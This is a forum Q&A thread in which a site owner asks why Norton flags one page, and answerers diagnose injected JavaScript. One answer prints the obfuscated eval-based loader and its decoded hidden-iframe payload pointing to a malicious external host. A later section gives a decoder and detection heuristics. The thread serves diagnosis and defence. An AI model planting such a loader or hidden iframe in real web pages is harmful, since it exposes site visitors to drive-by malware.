2

My client reports that [this page][1] I designed is blocked by his antivirus (Norton). The rest of the website is not blocked. Do you have any idea why Norton would block this page? The report says "web attack: mass injection website 5".

John Conde
drake035

3 Answers

3

There is definitely some JavaScript embedded in that page that looks fishy. It is JavaScript that is obfuscated by being stored as numbers in an array.

Excerpt reproduced below:

<script type="text/javascript" language="javascript">
try{window.document.body++}catch(gdsgsdg){dbshre=242;}if(dbshre){asd=0;
try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd)
{e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,101,109,107,100, [....] 23,117,6,4,120,32,32,34,53);s="";for(i=0;i-494!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}</script>
<script type="text/javascript" src="http://intlwellness.com/wp-content/themes/intlwellness/jquery.validate.min.js"></script>

So if you haven't put it there, the site is somehow compromised.


EDIT: If you were to execute the above code in its entirety then it would generate and execute the following JavaScript:

(function () {
    var jvskl = document.createElement('iframe');

    jvskl.src = 'http://archiwumprasy.com/clk.php';
    jvskl.style.position = 'absolute';
    jvskl.style.border = '0';
    jvskl.style.height = '1px';
    jvskl.style.width = '1px';
    jvskl.style.left = '1px';
    jvskl.style.top = '1px';

    if (!document.getElementById('jvskl')) {
        document.write('<div id=\'jvskl\'></div>');
        document.getElementById('jvskl').appendChild(jvskl);
    }
})();

Which, as you can see, creates a hidden iframe that loads a malicious URL. That particular URL is known for distributing malware; however, it does appear to be benign currently.

MrWhite
Free Radical
  • Weird, I didn't see that code. There must be something server side that decides when to send that code to the browser. – ZippyV Jan 06 '13 at 19:03
  • For what it is worth, I downloaded the page with curl, not with a browser. – Free Radical Jan 06 '13 at 19:07
  • Out of curiosity, I've added the unobfuscated version of the injected code to the answer, to see what it actually does. – MrWhite Jan 08 '13 at 20:30
  • 1
    @w3d. Thanks for spending the time unobfuscating it and adding it to my answer! Very educational. – Free Radical Jan 08 '13 at 20:36
  • Thanks a lot w3d and Gisle Hannemyr. It's scary to learn that people can add code stuff to my pages through forms! But how can I fix the problem now? – drake035 Jan 08 '13 at 22:54
  • Securing a website against injection attacks is a big subject and, oddly enough, searching did not give me anything relevant here (here = WebMasters.SE). You may want to ask about this in a separate question. Here is something to get you started: http://www.webmastersessions.com/how-to-secure-your-website-sql-injection - but note that SQL injection is only one of many attack vectors. – Free Radical Jan 10 '13 at 14:12
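To see what the decoding loop in the excerpt above actually does without handing the result to `eval`, here is an added example (it is not part of the answer, and not code from the affected site). The loader rebuilds each character as `asgq[i] - (i%5-5-4)`, i.e. `asgq[i] + 9 - (i % 5)`, so the offset depends on the position in the array and a slice only decodes correctly if you know where it starts. The sample page below is constructed: it reuses the 28 array values that are visible at the start of the excerpt and the nine visible at its end; since the loop runs 494 times, those last nine sit at indices 485 to 493.

```javascript
// Added example (not from the original answer): decode the numeric-array
// obfuscation used by the injected loader, without ever calling eval.

// Mirrors s += String.fromCharCode(1*asgq[i] - (i%5 - 5 - 4)) from the excerpt.
// startIndex is the position in the original array that codes[0] came from.
function decodeNumericArray(codes, startIndex = 0) {
  let out = "";
  for (let k = 0; k < codes.length; k++) {
    const i = startIndex + k;
    out += String.fromCharCode(codes[k] - (i % 5 - 5 - 4));
  }
  return out;
}

// Pull every `new Array(n, n, ...)` literal out of a page source. The injected
// loader stores its payload this way; hand-written scripts rarely do.
function extractNumericArrays(html) {
  const re = /new Array\(\s*([\d\s,]+?)\s*\)/g;
  const arrays = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    arrays.push(m[1].split(",").map((n) => parseInt(n.trim(), 10)));
  }
  return arrays;
}

// Heuristics matching this loader: an eval reference, fromCharCode reached
// through a string key, and a large all-numeric array in the same source.
function looksLikeNumericArrayLoader(html) {
  return (
    /\beval\b/.test(html) &&
    /\[\s*["']fromCharCode["']\s*\]/.test(html) &&
    extractNumericArrays(html).some((a) => a.length >= 20)
  );
}

// Decode every candidate array found on a page; nothing is executed.
function decodeInjectedPayloads(html) {
  return extractNumericArrays(html).map((a) => decodeNumericArray(a));
}

// The 28 values visible at the start of the excerpt (indices 0..27).
const VISIBLE_PREFIX = [31, 94, 110, 104, 94, 107, 97, 104, 104, 27, 31, 33, 25, 117,
  8, 1, 24, 25, 26, 27, 109, 89, 107, 26, 101, 109, 107, 100];
// The 9 values visible at the end of the excerpt; the real array has 494
// elements (the loop stops at i == 494), so these are indices 485..493.
const VISIBLE_SUFFIX = [23, 117, 6, 4, 120, 32, 32, 34, 53];
const SUFFIX_START = 494 - VISIBLE_SUFFIX.length;

// Constructed sample page: the loader from the excerpt, shortened to the
// visible prefix so the whole thing is self-contained.
const CONSTRUCTED_PAGE = `<html><body>
<script type="text/javascript">
try{window.document.body++}catch(gdsgsdg){dbshre=242;}if(dbshre){asd=0;
try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd)
{e=eval;}ss=String;asgq=new Array(${VISIBLE_PREFIX.join(",")});s="";
for(i=0;i-${VISIBLE_PREFIX.length}!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}
</script>
<script src="/wp-content/themes/intlwellness/jquery.validate.min.js"></script>
</body></html>`;

console.log(JSON.stringify(decodeNumericArray(VISIBLE_PREFIX)));
console.log(JSON.stringify(decodeNumericArray(VISIBLE_SUFFIX, SUFFIX_START)));
console.log(looksLikeNumericArrayLoader(CONSTRUCTED_PAGE));
```

The prefix decodes to `(function () {\r\n    var jvsk` and the suffix to ` }\r\n})();`, matching the start and end of the unobfuscated payload in the EDIT above. Two other details of the loader are worth noticing when triaging: `(020==0x10)` is always true (octal 16 equals hex 16), so it is padding, not a check; and `try{window.document.body++}catch(...){dbshre=242;}` only sets the flag inside a real browser DOM, which is one reason a loader like this can behave differently under a scanner than in a visitor's browser.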
1

Probably someone injected malicious JS code into the page, but checking with Google it doesn't seem that there is anything: http://www.google.com/safebrowsing/diagnostic?site=http://intlwellness.com/

Benjamin
  • Although the last time Google checked the site was on 2012-12-30, so maybe something happened in the last week? – MrWhite Jan 06 '13 at 19:03
  • 1
    Or there is a check on the server-side to not send harmful js code when a Google bot visits. – ZippyV Jan 06 '13 at 19:08
  • Wow but how could anybody "inject" code in my page? I mean you need FTP access for that no? How to fix the problem? Is it enough to re-upload the page? – drake035 Jan 07 '13 at 18:35
  • No, because if you re-upload it without fixing the problem you will face the same problems again in the future. Could you please upload the page (the original, not the one with the malware) on MediaFire and link it here? I will check it. – Benjamin Jan 07 '13 at 22:14
  • Thx Benjamin, here's the link: http://www.mediafire.com/?h1bdd52e519ehq8 – drake035 Jan 08 '13 at 22:51
  • OK, I checked it: it includes some scripts, maybe someone used them to inject malicious code into your pages. Please update (if there is an update) all the scripts to the latest version. I also noticed another thing: you use WordPress! WordPress is full of bugs (not the latest version but the previous ones). Did you install common WordPress scripts such as timthumb? They are easily crackable. – Benjamin Jan 09 '13 at 15:07
1

I have just experienced the same. Someone actually managed to put a bizarre action in my htaccess and at the same time inserted a very similar code into my header.php (this was on a WordPress installation). I stripped the htaccess and removed the numbered array from the header. Then, the next day, the code was back in the header, but not in my htaccess. So I removed it from the header again, and now it seems to be gone. At least I am not blacklisted any more. For the time. (I upgraded my WordPress and installed a plugin called BulletProof Security.) The date on my altered header.php was not changed.

PS: Have a look at this link, and go ahead and edit your htaccess. http://perishablepress.com/5g-blacklist-2012/

John
  • Is there not any safe, bullet-proof way to get protection from this kind of thing? – drake035 Jan 10 '13 at 11:49
  • I am afraid not. Open source platforms are vulnerable to attackers all the time. But we can make it harder for them. Rule number one is to always back up everything. Rule number two is to use all kinds of security measures available, among them: always make sure you have the latest versions of everything. Query string and text-box injections are among the most common ways these bastards use to destroy other people's work. – John Jan 10 '13 at 12:07
  • Maybe a Wordpress plugin that is vulnerable? – MrWhite Jan 10 '13 at 12:41
  • If you use WordPress and don't screen themes or plugins before deploying them, that is a possibility: http://hannemyr.com/roztr/content_show.php?id=22 – Free Radical Jan 10 '13 at 14:21